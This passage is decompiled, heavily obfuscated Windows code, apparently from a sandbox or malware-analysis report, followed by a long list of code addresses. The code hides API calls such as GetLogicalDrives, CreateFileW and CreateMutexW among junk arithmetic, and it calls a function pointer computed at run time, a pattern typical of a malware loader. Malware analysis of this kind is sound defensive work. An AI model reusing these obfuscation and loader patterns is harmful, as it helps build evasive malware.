										_push( *_v388 & 0x0000ffff);
										_push( *_v96 & 0x000000ff);
										E00405F90(_v201 & 0x000000ff);
										_t3173 = _t3173 + 0xc;
										_v468 =  *_v40 - _v452;
										goto L118;
									}
									_v820 = _v168;
									if(_v820 == 0x75b0) {
										_v364 =  *_v344 &  *_v460;
										_v304 =  *_v52 +  *_v40;
										E004035E0( *_v120,  *_v460);
									}
									_v136 = _v136 ^ 0xabb3a47c;
									_t1732 = GetLogicalDrives(); // executed
									_v32 = _t1732;
									_v461 =  *_v448;
									_v268 = 0x1488d2df;
									 *_v96 = ( *_v44 & 0x000000ff) + (_v329 & 0x000000ff);
									_v236 = ( *_v60 & 0x0000ffff) + (_v432 & 0x0000ffff);
									_v456 = _v348;
									_v268 = _v268 ^ 0x1488c229;
									_v112 =  *_v232 - _v348;
									 *0x437b80 = 0x414006;
									_v392 = _v268;
									_v148 =  &_v156;
									_v329 = ( *_v44 & 0x000000ff) - (_v384 & 0x000000ff);
									_v408 =  *_v344 * _v368;
									_v356 =  &_v132;
									_v364 =  *_v344 &  *_v460;
									_v288 =  *_v460;
									_v236 = ( *_v148 & 0x0000ffff) + (_v432 & 0x0000ffff);
									_v383 = _v381;
									 *0x437b88 =  *_v248;
									_v780 = _v152(_v136, _v268, _v392);
									 *_v356 = _v112 - _v252;
									_v100 = CreateFileW(L"de7z0WJA4\\fa\\yMszmIm", 0x80000000, 2, 0, 4, 8, 0);
									_t2338 =  *0x437b80; // 0x414006
									if( *_v448 -  *_v76 >  *_v164 <<  *_t2338) {
										asm("cdq");
										if(( *_v344 | _v364) <=  *_v460 /  *0x437b84) {
											_v201 =  *_v76 & _v461;
										}
										goto L111;
									} else {
										 *_v60 = ( *_v476 & 0x0000ffff) + (_v172 & 0x0000ffff);
										_v433 =  *_v248;
										_t2911 =  *0x437b80; // 0x414006
										if( *_t2911 + _v281 >= _v201 -  *_v164) {
											if(( *_v248 & 0x000000ff) + (_v381 & 0x000000ff) == (_v329 & 0x000000ff) - (_v433 & 0x000000ff)) {
												L108:
												 *_v356 =  *_v120 -  *_v232;
												_v84 =  *_v460 & _v288;
												 *0x437b84 =  *_v460 +  *_v344;
												L111:
												 *_v460 =  *_v460 ^  *_v344;
												_v272 = _v304 >>  *_v40;
												goto L114;
											}
											_v28 = _v780;
											_v368 =  *_v344 >>  *_v460;
											_v328 = CreateFileW(L"Yl77GRFLUv\\yB2EF3", 0x80000000, 4, 0, 2, 0x400, 0);
											_v20 =  &_v432;
											_v329 =  *_v248 & 0x000000ff |  *_v44 & 0x000000ff;
											_v440 = 0x764a6e1b;
											_v264 =  &_v288;
											_v824 =  *_v448;
											if(_v824 == 0) {
												if(( *_v40 ^  *_v52) <= _v452 - _v304) {
													E00403440( *_v476, _v240);
													_v24 =  *_v232 &  *_v120;
												}
											} else {
												if(_v824 == 0x65) {
													 *_v344 =  *_v460 - _v108;
												}
											}
											_v104 = 0x14;
											if(_v468 - _v272 < _v452 - _v304) {
												if( *_v356 +  *_v376 != _v256 + _v240) {
													_v240 = _v24 >>  *_v232;
												}
											} else {
												_v408 =  *_v344 + _v48;
												 *0x437b90 =  &_v88;
												_v305 = _v381;
												_v236 = (_v172 & 0x0000ffff) + (_v432 & 0x0000ffff);
												_v312 =  *_v40;
												_v257 =  *_v164 &  *_v448;
											}
											_v404 = GetCurrentProcess();
											_v288 = _v108 ^  *_v264;
											_v292 = _v140;
											if( *_v356 <<  *_v376 < ( *_v232 | _v480)) {
												L107:
												_push( *_v148 & 0x0000ffff);
												_push( *_v96 & 0x000000ff);
												E00405F90( *_v448 & 0x000000ff);
												_t3173 = _t3173 + 0xc;
												goto L108;
											} else {
												_v208 = _v88;
												_v329 = (_v357 & 0x000000ff) + (_v383 & 0x000000ff);
												_v180 = _v408;
												 *_v460 =  *_v460 -  *_v264;
												_v348 = _v240 & _v252;
												_v228 = 0xb919b905;
												_v276 = _v172;
												 *_v96 = ( *_v44 & 0x000000ff) + (_v293 & 0x000000ff);
												_v280 =  *_v344;
												_v228 = _v228 ^ 0xb86da7ea;
												_v372 = CreateMutexW(0, 0, 0);
												 *_v344 =  *_v264 -  *_v460;
												if(_v461 +  *_v76 != _v281 + _v257) {
													L106:
													_v132 = _v252 - _v456;
													goto L107;
												}
												 *0x436b8c =  *_v264 -  *_v344;
												_v92 = _v380;
												while(_v104 < _v228) {
													_t2421 =  *0x437b80; // 0x414006
													_v461 =  *_t2421 - _v201;
													 *_v52 =  *_v40 + _v468;
													_v432 =  *_v476 & 0x0000ffff |  *_v388 & 0x0000ffff;
													 *_v248 = (_v433 & 0x000000ff) << ( *_v96 & 0x000000ff);
													_v125 =  *_v292;
													_v252 = _v240 >> _v132;
													_t2429 =  *0x437b84; // 0x1c000000
													_v84 = _t2429 ^  *_v344;
													_v276 =  *_v148 & 0x0000ffff &  *_v60 & 0x0000ffff;
													_t2433 =  *0x437b90; // 0x0
													 *_t2433 = (_v236 & 0x0000ffff) + ( *_v148 & 0x0000ffff);
													_v132 = _v240 + _v456;
													asm("ror al, cl");
													_v84 = _v364 &  *_v460;
													_v280 =  *_v344 -  *_v264;
													_v256 = _v112 - _v24;
													 *_v96 = ( *_v248 & 0x000000ff) - (_v384 & 0x000000ff);
													 *_v476 = ( *_v388 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
													_v125 = (_v125 & 0x000000ff) - _v440;
													_v168 = _v368 -  *0x436b8c;
													_v364 = _v280 |  *_v344;
													_t1852 =  *0x437b80; // 0x414006
													 *_t1852 =  *_v76 << _v201;
													_v468 = _v312 >> _v304;
													_v236 = _v208 & 0x0000ffff ^  *_v148 & 0x0000ffff;
													_v433 =  *_v44 & 0x000000ff &  *_v96 & 0x000000ff;
													 *_v28 = _v125;
													 *_v232 = _v240 + _v256;
													_v240 = _v112 +  *_v376;
													_v292 = _v292 + 1;
													_v380 = _v368 + _v212;
													_v108 = _v124 - _v168;
													_v428 = CreateFileW(L"QY\\UPMBHwXRVj\\Xlb\\aNYnG", 0x40000000, 8, 0, 5, 0x20, 0);
													 *_v460 =  *_v460 & _v84;
													_v28 = _v28 + 1;
													_v172 = (_v208 & 0x0000ffff) - (_v156 & 0x0000ffff);
													 *0x437b88 = ( *_v68 & 0x000000ff) + ( *_v248 & 0x000000ff);
													 *_v356 = _v240 - _v132;
													_v776 =  *_v460 -  *_v344;
													 *_v460 = _v180 << _v212;
													asm("ror ecx, 0x1b");
													_v348 = _v456 |  *_v376;
													 *_v68 = ( *0x437b88 & 0x000000ff) >> (_v329 & 0x000000ff);
													_v88 = _v432 & 0x0000ffff ^ _v276 & 0x0000ffff;
													_v468 =  *_v52 & _v304;
													_v281 = _v257 +  *_v76;
													 *0x414004 =  *_v52 +  *_v40;
													_v440 = _v440 + 0x8c75;
													_v184 = IsProcessorFeaturePresent(3);
													_v92 =  *_v460 +  *_v344;
													_v383 = ( *_v248 & 0x000000ff) - (_v357 & 0x000000ff);
													_v104 = _v104 + 0x226a7;
													_t1884 =  *0x437b90; // 0x0
													 *_v20 = ( *_t1884 & 0x0000ffff) - ( *_v388 & 0x0000ffff);
													 *_v460 =  *_v264 &  *_v344;
												}
												if(_v452 -  *_v52 >= _v304 + _v468) {
													 *_v264 =  *_v344 |  *_v460;
												} else {
													_v224 = _v780 + 0xad;
													if(_v201 >>  *_v76 != ( *_v164 &  *_v448)) {
														 *_v264 =  *_v344 +  *_v460;
														E00403440( *_v60, _v240);
														_v433 = ( *0x437b88 & 0x000000ff) - ( *_v44 & 0x000000ff);
														 *0x436b88 = (_v236 & 0x0000ffff) + (_v156 & 0x0000ffff);
													}
													_v220 = _v140 + 0xad;
													_v240 =  *_v356 +  *_v376;
													 *_v460 = _v368 - _v108;
													_v396 =  &_v124;
													_v84 =  *_v264 + _v124;
													_v200 = _v364;
													_v257 =  *_v448 &  *_v164;
													_v8 =  &_v468;
													_v780( &_v224);
													_v88 = (_v172 & 0x0000ffff) - (_v236 & 0x0000ffff);
													 *0x437b8c =  &_v357;
													_v12 =  *_v120;
													_v112 =  *_v376 ^ _v456;
													_v409 =  *_v44;
													_v276 = _v156 & 0x0000ffff | _v88 & 0x0000ffff;
												}
												_v240 = _v24 ^ _v252;
												goto L106;
											}
										}
										_v112 =  *_v356 << _v240;
										goto L108;
									}
								}
							}
							goto L116;
						}
					}
				} else {
					if(_v788 == 0x714c) {
						_v212 = _v364 <<  *_v344;
						_v240 = _v240 | 0x0000a1f9;
						_v212 = _v364 -  *_v344;
						_t2022 = _v36;
						_push(_t2022);
						L00406036();
						_v420 = _t2022;
						 *_v44 = ( *_v44 & 0x000000ff) + (_v357 & 0x000000ff);
						E004035B0( *_v44, _v240);
					}
					L122:
					_push( *_v476 & 0x0000ffff);
					_push( *_v44 & 0x000000ff);
					E00405F90( *_v76 & 0x000000ff);
					goto L123;
				}
			}



















































































































































                                                                                                                                                                                            0x0040362a
                                                                                                                                                                                            0x00403631
                                                                                                                                                                                            0x00403640
                                                                                                                                                                                            0x0040364d
                                                                                                                                                                                            0x00403655
                                                                                                                                                                                            0x0040365c
                                                                                                                                                                                            0x0040366a
                                                                                                                                                                                            0x00403678
                                                                                                                                                                                            0x0040367c
                                                                                                                                                                                            0x00403689
                                                                                                                                                                                            0x00403695
                                                                                                                                                                                            0x004036af
                                                                                                                                                                                            0x004036c6
                                                                                                                                                                                            0x004036c8
                                                                                                                                                                                            0x004036d8
                                                                                                                                                                                            0x004036df
                                                                                                                                                                                            0x004036e6
                                                                                                                                                                                            0x004036f5
                                                                                                                                                                                            0x004036fb
                                                                                                                                                                                            0x004036fb
                                                                                                                                                                                            0x00403716
                                                                                                                                                                                            0x00403716
                                                                                                                                                                                            0x0040371c
                                                                                                                                                                                            0x00403725
                                                                                                                                                                                            0x00403735
                                                                                                                                                                                            0x0040374f
                                                                                                                                                                                            0x0040375d
                                                                                                                                                                                            0x00405f63
                                                                                                                                                                                            0x00405f73
                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                            0x0040376b
                                                                                                                                                                                            0x00403771
                                                                                                                                                                                            0x00403781
                                                                                                                                                                                            0x0040378a
                                                                                                                                                                                            0x0040379a
                                                                                                                                                                                            0x004037b7
                                                                                                                                                                                            0x004037d1
                                                                                                                                                                                            0x004037f2
                                                                                                                                                                                            0x004037f7
                                                                                                                                                                                            0x004037f7
                                                                                                                                                                                            0x00403800
                                                                                                                                                                                            0x0040380e
                                                                                                                                                                                            0x00403814
                                                                                                                                                                                            0x00403821
                                                                                                                                                                                            0x00403839
                                                                                                                                                                                            0x00403840
                                                                                                                                                                                            0x0040384f
                                                                                                                                                                                            0x0040385b
                                                                                                                                                                                            0x0040386f
                                                                                                                                                                                            0x00405e9a
                                                                                                                                                                                            0x00405eac
                                                                                                                                                                                            0x00405ebc
                                                                                                                                                                                            0x00405ecd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405ecd
                                                                                                                                                                                            0x0040387d
                                                                                                                                                                                            0x00403889
                                                                                                                                                                                            0x00403892
                                                                                                                                                                                            0x0040389e
                                                                                                                                                                                            0x004038b1
                                                                                                                                                                                            0x004038bd
                                                                                                                                                                                            0x004038cd
                                                                                                                                                                                            0x0040397e
                                                                                                                                                                                            0x004038d3
                                                                                                                                                                                            0x004038dd
                                                                                                                                                                                            0x004038ea
                                                                                                                                                                                            0x004038f3
                                                                                                                                                                                            0x00403900
                                                                                                                                                                                            0x0040390d
                                                                                                                                                                                            0x00403920
                                                                                                                                                                                            0x0040393c
                                                                                                                                                                                            0x00403902
                                                                                                                                                                                            0x00403909
                                                                                                                                                                                            0x0040394d
                                                                                                                                                                                            0x00403961
                                                                                                                                                                                            0x00403961
                                                                                                                                                                                            0x00403909
                                                                                                                                                                                            0x00403967
                                                                                                                                                                                            0x004038dd
                                                                                                                                                                                            0x00403987
                                                                                                                                                                                            0x00403994
                                                                                                                                                                                            0x0040399d
                                                                                                                                                                                            0x004039ae
                                                                                                                                                                                            0x004039b8
                                                                                                                                                                                            0x004039bf
                                                                                                                                                                                            0x004039dd
                                                                                                                                                                                            0x004039e8
                                                                                                                                                                                            0x004039ff
                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                            0x00403a22
                                                                                                                                                                                            0x00403a2b
                                                                                                                                                                                            0x00403a43
                                                                                                                                                                                            0x00403a53
                                                                                                                                                                                            0x00403a66
                                                                                                                                                                                            0x00403a7b
                                                                                                                                                                                            0x00403a91
                                                                                                                                                                                            0x00403aa0
                                                                                                                                                                                            0x00403aba
                                                                                                                                                                                            0x00403acc
                                                                                                                                                                                            0x00403acc
                                                                                                                                                                                            0x00403add
                                                                                                                                                                                            0x00403af3
                                                                                                                                                                                            0x00403af6
                                                                                                                                                                                            0x00403b17
                                                                                                                                                                                            0x00403b20
                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                            0x00403b3b
                                                                                                                                                                                            0x00403b42
                                                                                                                                                                                            0x00403b51
                                                                                                                                                                                            0x00403b62
                                                                                                                                                                                            0x00403b76
                                                                                                                                                                                            0x00403b8d
                                                                                                                                                                                            0x00403ba2
                                                                                                                                                                                            0x00403bbb
                                                                                                                                                                                            0x00403bcd
                                                                                                                                                                                            0x00403bda
                                                                                                                                                                                            0x00403bef
                                                                                                                                                                                            0x00403c04
                                                                                                                                                                                            0x00403c20
                                                                                                                                                                                            0x00403c2f
                                                                                                                                                                                            0x00403c45
                                                                                                                                                                                            0x00403c54
                                                                                                                                                                                            0x00403c6c
                                                                                                                                                                                            0x00403c7a
                                                                                                                                                                                            0x00403c8e
                                                                                                                                                                                            0x00403ca0
                                                                                                                                                                                            0x00403cb4
                                                                                                                                                                                            0x00403ccf
                                                                                                                                                                                            0x00403ce5
                                                                                                                                                                                            0x00403cf7
                                                                                                                                                                                            0x00403d08
                                                                                                                                                                                            0x00403d19
                                                                                                                                                                                            0x00403d2c
                                                                                                                                                                                            0x00403d42
                                                                                                                                                                                            0x00403d54
                                                                                                                                                                                            0x00403d69
                                                                                                                                                                                            0x00403d7b
                                                                                                                                                                                            0x00403d8b
                                                                                                                                                                                            0x00403d9a
                                                                                                                                                                                            0x00403daf
                                                                                                                                                                                            0x00403dc2
                                                                                                                                                                                            0x00403dd6
                                                                                                                                                                                            0x00403de9
                                                                                                                                                                                            0x00403dfa
                                                                                                                                                                                            0x00403e0d
                                                                                                                                                                                            0x00403e1f
                                                                                                                                                                                            0x00403e37
                                                                                                                                                                                            0x00403e49
                                                                                                                                                                                            0x00403e5d
                                                                                                                                                                                            0x00403e6e
                                                                                                                                                                                            0x00403e82
                                                                                                                                                                                            0x00403e96
                                                                                                                                                                                            0x00403eab
                                                                                                                                                                                            0x00403ebe
                                                                                                                                                                                            0x00403ed3
                                                                                                                                                                                            0x00403eec
                                                                                                                                                                                            0x00403efa
                                                                                                                                                                                            0x00403f0b
                                                                                                                                                                                            0x00403f11
                                                                                                                                                                                            0x00403f26
                                                                                                                                                                                            0x00403f2c
                                                                                                                                                                                            0x00403f46
                                                                                                                                                                                            0x00403f70
                                                                                                                                                                                            0x00403fa1
                                                                                                                                                                                            0x00403fa6
                                                                                                                                                                                            0x00403fb1
                                                                                                                                                                                            0x00403fb7
                                                                                                                                                                                            0x00403fc7
                                                                                                                                                                                            0x00403fd3
                                                                                                                                                                                            0x00403fd4
                                                                                                                                                                                            0x00403fd6
                                                                                                                                                                                            0x00403fd8
                                                                                                                                                                                            0x00403fdb
                                                                                                                                                                                            0x00403fdc
                                                                                                                                                                                            0x00403fe1
                                                                                                                                                                                            0x00403ff5
                                                                                                                                                                                            0x00403ff7
                                                                                                                                                                                            0x00403ff7
                                                                                                                                                                                            0x00403f72
                                                                                                                                                                                            0x00403f80
                                                                                                                                                                                            0x00403f80
                                                                                                                                                                                            0x00403ffc
                                                                                                                                                                                            0x00404028
                                                                                                                                                                                            0x0040407b
                                                                                                                                                                                            0x004040a2
                                                                                                                                                                                            0x004040b3
                                                                                                                                                                                            0x004040c4
                                                                                                                                                                                            0x004040c4
                                                                                                                                                                                            0x0040402a
                                                                                                                                                                                            0x00404038
                                                                                                                                                                                            0x00404050
                                                                                                                                                                                            0x00404069
                                                                                                                                                                                            0x00404069
                                                                                                                                                                                            0x004040d0
                                                                                                                                                                                            0x004040e0
                                                                                                                                                                                            0x00404102
                                                                                                                                                                                            0x00404105
                                                                                                                                                                                            0x004040e2
                                                                                                                                                                                            0x004040ec
                                                                                                                                                                                            0x00404112
                                                                                                                                                                                            0x0040412a
                                                                                                                                                                                            0x00404134
                                                                                                                                                                                            0x00404140
                                                                                                                                                                                            0x0040414c
                                                                                                                                                                                            0x0040415d
                                                                                                                                                                                            0x0040415d
                                                                                                                                                                                            0x004040ec
                                                                                                                                                                                            0x00404168
                                                                                                                                                                                            0x00404171
                                                                                                                                                                                            0x00404177
                                                                                                                                                                                            0x00404198
                                                                                                                                                                                            0x004041a3
                                                                                                                                                                                            0x004041ba
                                                                                                                                                                                            0x004041cf
                                                                                                                                                                                            0x004041e5
                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                            0x00404213
                                                                                                                                                                                            0x00404227
                                                                                                                                                                                            0x0040423d
                                                                                                                                                                                            0x00404253
                                                                                                                                                                                            0x0040426b
                                                                                                                                                                                            0x0040427d
                                                                                                                                                                                            0x00404296
                                                                                                                                                                                            0x004042b0
                                                                                                                                                                                            0x004042c2
                                                                                                                                                                                            0x004042d6
                                                                                                                                                                                            0x004042ec
                                                                                                                                                                                            0x004042fe
                                                                                                                                                                                            0x004042fe
                                                                                                                                                                                            0x00404309
                                                                                                                                                                                            0x00404313
                                                                                                                                                                                            0x00404329
                                                                                                                                                                                            0x00404342
                                                                                                                                                                                            0x00404354
                                                                                                                                                                                            0x00404360
                                                                                                                                                                                            0x0040436d
                                                                                                                                                                                            0x00404381
                                                                                                                                                                                            0x00404395
                                                                                                                                                                                            0x004043a8
                                                                                                                                                                                            0x004043c1
                                                                                                                                                                                            0x004043d1
                                                                                                                                                                                            0x004043e6
                                                                                                                                                                                            0x004043f6
                                                                                                                                                                                            0x00404404
                                                                                                                                                                                            0x0040441b
                                                                                                                                                                                            0x0040442f
                                                                                                                                                                                            0x00404442
                                                                                                                                                                                            0x00404456
                                                                                                                                                                                            0x00404469
                                                                                                                                                                                            0x0040447a
                                                                                                                                                                                            0x00404497
                                                                                                                                                                                            0x004044a8
                                                                                                                                                                                            0x004044be
                                                                                                                                                                                            0x004044ce
                                                                                                                                                                                            0x004044e5
                                                                                                                                                                                            0x004044fe
                                                                                                                                                                                            0x00404514
                                                                                                                                                                                            0x0040451e
                                                                                                                                                                                            0x0040452a
                                                                                                                                                                                            0x0040453a
                                                                                                                                                                                            0x0040454b
                                                                                                                                                                                            0x0040455f
                                                                                                                                                                                            0x00404573
                                                                                                                                                                                            0x00404580
                                                                                                                                                                                            0x00404590
                                                                                                                                                                                            0x004045ac
                                                                                                                                                                                            0x004045bd
                                                                                                                                                                                            0x004045d4
                                                                                                                                                                                            0x004045e5
                                                                                                                                                                                            0x004045f2
                                                                                                                                                                                            0x00404609
                                                                                                                                                                                            0x0040461a
                                                                                                                                                                                            0x00404631
                                                                                                                                                                                            0x00404643
                                                                                                                                                                                            0x0040465a
                                                                                                                                                                                            0x00404673
                                                                                                                                                                                            0x0040467d
                                                                                                                                                                                            0x00404692
                                                                                                                                                                                            0x004046af
                                                                                                                                                                                            0x004046be
                                                                                                                                                                                            0x004046d1
                                                                                                                                                                                            0x004046d3
                                                                                                                                                                                            0x004046e0
                                                                                                                                                                                            0x00404700
                                                                                                                                                                                            0x00404716
                                                                                                                                                                                            0x00404728
                                                                                                                                                                                            0x00404741
                                                                                                                                                                                            0x0040474c
                                                                                                                                                                                            0x0040475e
                                                                                                                                                                                            0x0040476a
                                                                                                                                                                                            0x0040477d
                                                                                                                                                                                            0x00404790
                                                                                                                                                                                            0x004047a1
                                                                                                                                                                                            0x004047b6
                                                                                                                                                                                            0x004047d2
                                                                                                                                                                                            0x004047e3
                                                                                                                                                                                            0x004047f9
                                                                                                                                                                                            0x00404808
                                                                                                                                                                                            0x00404816
                                                                                                                                                                                            0x0040482e
                                                                                                                                                                                            0x0040482e
                                                                                                                                                                                            0x00404840
                                                                                                                                                                                            0x00404852
                                                                                                                                                                                            0x0040485e
                                                                                                                                                                                            0x00404873
                                                                                                                                                                                            0x0040488a
                                                                                                                                                                                            0x004048b4
                                                                                                                                                                                            0x004048c6
                                                                                                                                                                                            0x004048dc
                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                            0x004048f8
                                                                                                                                                                                            0x004048f8
                                                                                                                                                                                            0x00404905
                                                                                                                                                                                            0x0040492c
                                                                                                                                                                                            0x0040493f
                                                                                                                                                                                            0x00404950
                                                                                                                                                                                            0x00404969
                                                                                                                                                                                            0x0040496f
                                                                                                                                                                                            0x00404981
                                                                                                                                                                                            0x00404996
                                                                                                                                                                                            0x00404996
                                                                                                                                                                                            0x004049be
                                                                                                                                                                                            0x004049c6
                                                                                                                                                                                            0x004049c7
                                                                                                                                                                                            0x004049cc
                                                                                                                                                                                            0x004049d2
                                                                                                                                                                                            0x004049d6
                                                                                                                                                                                            0x004049d7
                                                                                                                                                                                            0x004049dc
                                                                                                                                                                                            0x004049f6
                                                                                                                                                                                            0x004049f8
                                                                                                                                                                                            0x00404a11
                                                                                                                                                                                            0x00404a11
                                                                                                                                                                                            0x00404a21
                                                                                                                                                                                            0x00404a36
                                                                                                                                                                                            0x00404a61
                                                                                                                                                                                            0x00405e76
                                                                                                                                                                                            0x00405e92
                                                                                                                                                                                            0x00405e97
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404a67
                                                                                                                                                                                            0x00404a6f
                                                                                                                                                                                            0x00404a83
                                                                                                                                                                                            0x00404aac
                                                                                                                                                                                            0x00405e4b
                                                                                                                                                                                            0x00405e5a
                                                                                                                                                                                            0x00405e70
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404ab2
                                                                                                                                                                                            0x00404ab2
                                                                                                                                                                                            0x00404abe
                                                                                                                                                                                            0x00404ad2
                                                                                                                                                                                            0x00404ae1
                                                                                                                                                                                            0x00404af4
                                                                                                                                                                                            0x00404b08
                                                                                                                                                                                            0x00404b21
                                                                                                                                                                                            0x00404b35
                                                                                                                                                                                            0x00404b4a
                                                                                                                                                                                            0x00404b59
                                                                                                                                                                                            0x00404b67
                                                                                                                                                                                            0x00404b78
                                                                                                                                                                                            0x00404b8b
                                                                                                                                                                                            0x00404b9e
                                                                                                                                                                                            0x00404bab
                                                                                                                                                                                            0x00404bb7
                                                                                                                                                                                            0x00404bbf
                                                                                                                                                                                            0x00404bcb
                                                                                                                                                                                            0x00404be5
                                                                                                                                                                                            0x00404be9
                                                                                                                                                                                            0x00404c17
                                                                                                                                                                                            0x00404c27
                                                                                                                                                                                            0x00404c3d
                                                                                                                                                                                            0x00404c4e
                                                                                                                                                                                            0x00404c64
                                                                                                                                                                                            0x00404c64
                                                                                                                                                                                            0x00404c6e
                                                                                                                                                                                            0x00404c85
                                                                                                                                                                                            0x00404c8a
                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                            0x00404caa
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404c9c
                                                                                                                                                                                            0x00404cba
                                                                                                                                                                                            0x00404cd2
                                                                                                                                                                                            0x00404cdc
                                                                                                                                                                                            0x00404cec
                                                                                                                                                                                            0x00405d4b
                                                                                                                                                                                            0x00405d61
                                                                                                                                                                                            0x00405d6d
                                                                                                                                                                                            0x00404cf2
                                                                                                                                                                                            0x00404cfc
                                                                                                                                                                                            0x00404d08
                                                                                                                                                                                            0x00404d15
                                                                                                                                                                                            0x00404d6f
                                                                                                                                                                                            0x00404d84
                                                                                                                                                                                            0x00404d9c
                                                                                                                                                                                            0x00404dab
                                                                                                                                                                                            0x00404dc1
                                                                                                                                                                                            0x00404d17
                                                                                                                                                                                            0x00404d1e
                                                                                                                                                                                            0x00404d31
                                                                                                                                                                                            0x00404d41
                                                                                                                                                                                            0x00404d55
                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                            0x00404d1e
                                                                                                                                                                                            0x00404dcd
                                                                                                                                                                                            0x00404de0
                                                                                                                                                                                            0x00404ded
                                                                                                                                                                                            0x00404e04
                                                                                                                                                                                            0x00404e0d
                                                                                                                                                                                            0x00404e21
                                                                                                                                                                                            0x00404e27
                                                                                                                                                                                            0x00404e2d
                                                                                                                                                                                            0x00404e39
                                                                                                                                                                                            0x00404e46
                                                                                                                                                                                            0x00404f03
                                                                                                                                                                                            0x00404f04
                                                                                                                                                                                            0x00404f09
                                                                                                                                                                                            0x00404f25
                                                                                                                                                                                            0x00404f27
                                                                                                                                                                                            0x00404e4c
                                                                                                                                                                                            0x00404e53
                                                                                                                                                                                            0x00404e68
                                                                                                                                                                                            0x00404e86
                                                                                                                                                                                            0x00404e9b
                                                                                                                                                                                            0x00404eb1
                                                                                                                                                                                            0x00404ec7
                                                                                                                                                                                            0x00404edb
                                                                                                                                                                                            0x00404eea
                                                                                                                                                                                            0x00404efb
                                                                                                                                                                                            0x00404efb
                                                                                                                                                                                            0x00404e53
                                                                                                                                                                                            0x00404f2f
                                                                                                                                                                                            0x00404f45
                                                                                                                                                                                            0x00404f53
                                                                                                                                                                                            0x00404f60
                                                                                                                                                                                            0x00404f74
                                                                                                                                                                                            0x00404f89
                                                                                                                                                                                            0x00404f92
                                                                                                                                                                                            0x00404fa5
                                                                                                                                                                                            0x00404fbe
                                                                                                                                                                                            0x00404fc9
                                                                                                                                                                                            0x00404fcf
                                                                                                                                                                                            0x00404fdb
                                                                                                                                                                                            0x00404fed
                                                                                                                                                                                            0x00404fff
                                                                                                                                                                                            0x00405011
                                                                                                                                                                                            0x00405021
                                                                                                                                                                                            0x00405027
                                                                                                                                                                                            0x00405033
                                                                                                                                                                                            0x0040504e
                                                                                                                                                                                            0x00405078
                                                                                                                                                                                            0x00405ce3
                                                                                                                                                                                            0x00405cf0
                                                                                                                                                                                            0x00405cf0
                                                                                                                                                                                            0x00405cf6
                                                                                                                                                                                            0x00405d08
                                                                                                                                                                                            0x00405d24
                                                                                                                                                                                            0x00405d34
                                                                                                                                                                                            0x00405d72
                                                                                                                                                                                            0x00405d7e
                                                                                                                                                                                            0x00405d92
                                                                                                                                                                                            0x00405d94
                                                                                                                                                                                            0x00405d9d
                                                                                                                                                                                            0x00405d9e
                                                                                                                                                                                            0x00405da3
                                                                                                                                                                                            0x00405dba
                                                                                                                                                                                            0x00405dd2
                                                                                                                                                                                            0x00405dd7
                                                                                                                                                                                            0x00405dd7
                                                                                                                                                                                            0x00405de2
                                                                                                                                                                                            0x00405dfa
                                                                                                                                                                                            0x00405e12
                                                                                                                                                                                            0x00405e1d
                                                                                                                                                                                            0x00405e24
                                                                                                                                                                                            0x00405e2d
                                                                                                                                                                                            0x00405e32
                                                                                                                                                                                            0x00405e44
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405e44
                                                                                                                                                                                            0x00405084
                                                                                                                                                                                            0x00405094
                                                                                                                                                                                            0x004050a8
                                                                                                                                                                                            0x004050bc
                                                                                                                                                                                            0x004050d0
                                                                                                                                                                                            0x004050d0
                                                                                                                                                                                            0x004050e1
                                                                                                                                                                                            0x004050e7
                                                                                                                                                                                            0x004050ed
                                                                                                                                                                                            0x004050f8
                                                                                                                                                                                            0x004050fe
                                                                                                                                                                                            0x0040511a
                                                                                                                                                                                            0x0040512b
                                                                                                                                                                                            0x00405138
                                                                                                                                                                                            0x0040514a
                                                                                                                                                                                            0x0040515e
                                                                                                                                                                                            0x00405161
                                                                                                                                                                                            0x00405171
                                                                                                                                                                                            0x0040517d
                                                                                                                                                                                            0x00405192
                                                                                                                                                                                            0x004051a7
                                                                                                                                                                                            0x004051b0
                                                                                                                                                                                            0x004051c6
                                                                                                                                                                                            0x004051d4
                                                                                                                                                                                            0x004051ec
                                                                                                                                                                                            0x004051f9
                                                                                                                                                                                            0x00405207
                                                                                                                                                                                            0x00405228
                                                                                                                                                                                            0x0040523d
                                                                                                                                                                                            0x00405259
                                                                                                                                                                                            0x00405276
                                                                                                                                                                                            0x00405283
                                                                                                                                                                                            0x00405c73
                                                                                                                                                                                            0x00405c7c
                                                                                                                                                                                            0x00405c8d
                                                                                                                                                                                            0x00405c8d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405289
                                                                                                                                                                                            0x0040529e
                                                                                                                                                                                            0x004052a9
                                                                                                                                                                                            0x004052af
                                                                                                                                                                                            0x004052d5
                                                                                                                                                                                            0x00405313
                                                                                                                                                                                            0x00405c1f
                                                                                                                                                                                            0x00405c32
                                                                                                                                                                                            0x00405c42
                                                                                                                                                                                            0x00405c55
                                                                                                                                                                                            0x00405c93
                                                                                                                                                                                            0x00405ca9
                                                                                                                                                                                            0x00405cba
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405cba
                                                                                                                                                                                            0x0040531f
                                                                                                                                                                                            0x00405334
                                                                                                                                                                                            0x00405357
                                                                                                                                                                                            0x00405363
                                                                                                                                                                                            0x00405377
                                                                                                                                                                                            0x0040537d
                                                                                                                                                                                            0x0040538d
                                                                                                                                                                                            0x0040539b
                                                                                                                                                                                            0x004053a8
                                                                                                                                                                                            0x004053d5
                                                                                                                                                                                            0x004053e6
                                                                                                                                                                                            0x004053f8
                                                                                                                                                                                            0x004053f8
                                                                                                                                                                                            0x004053aa
                                                                                                                                                                                            0x004053b1
                                                                                                                                                                                            0x0040540e
                                                                                                                                                                                            0x0040540e
                                                                                                                                                                                            0x004053b1
